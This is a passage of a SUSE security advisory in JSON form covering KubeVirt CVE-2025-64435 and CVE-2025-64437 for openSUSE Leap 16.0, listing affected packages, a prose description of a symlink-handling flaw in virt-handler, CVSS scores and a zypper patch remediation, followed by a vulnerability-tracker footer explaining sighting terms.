"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…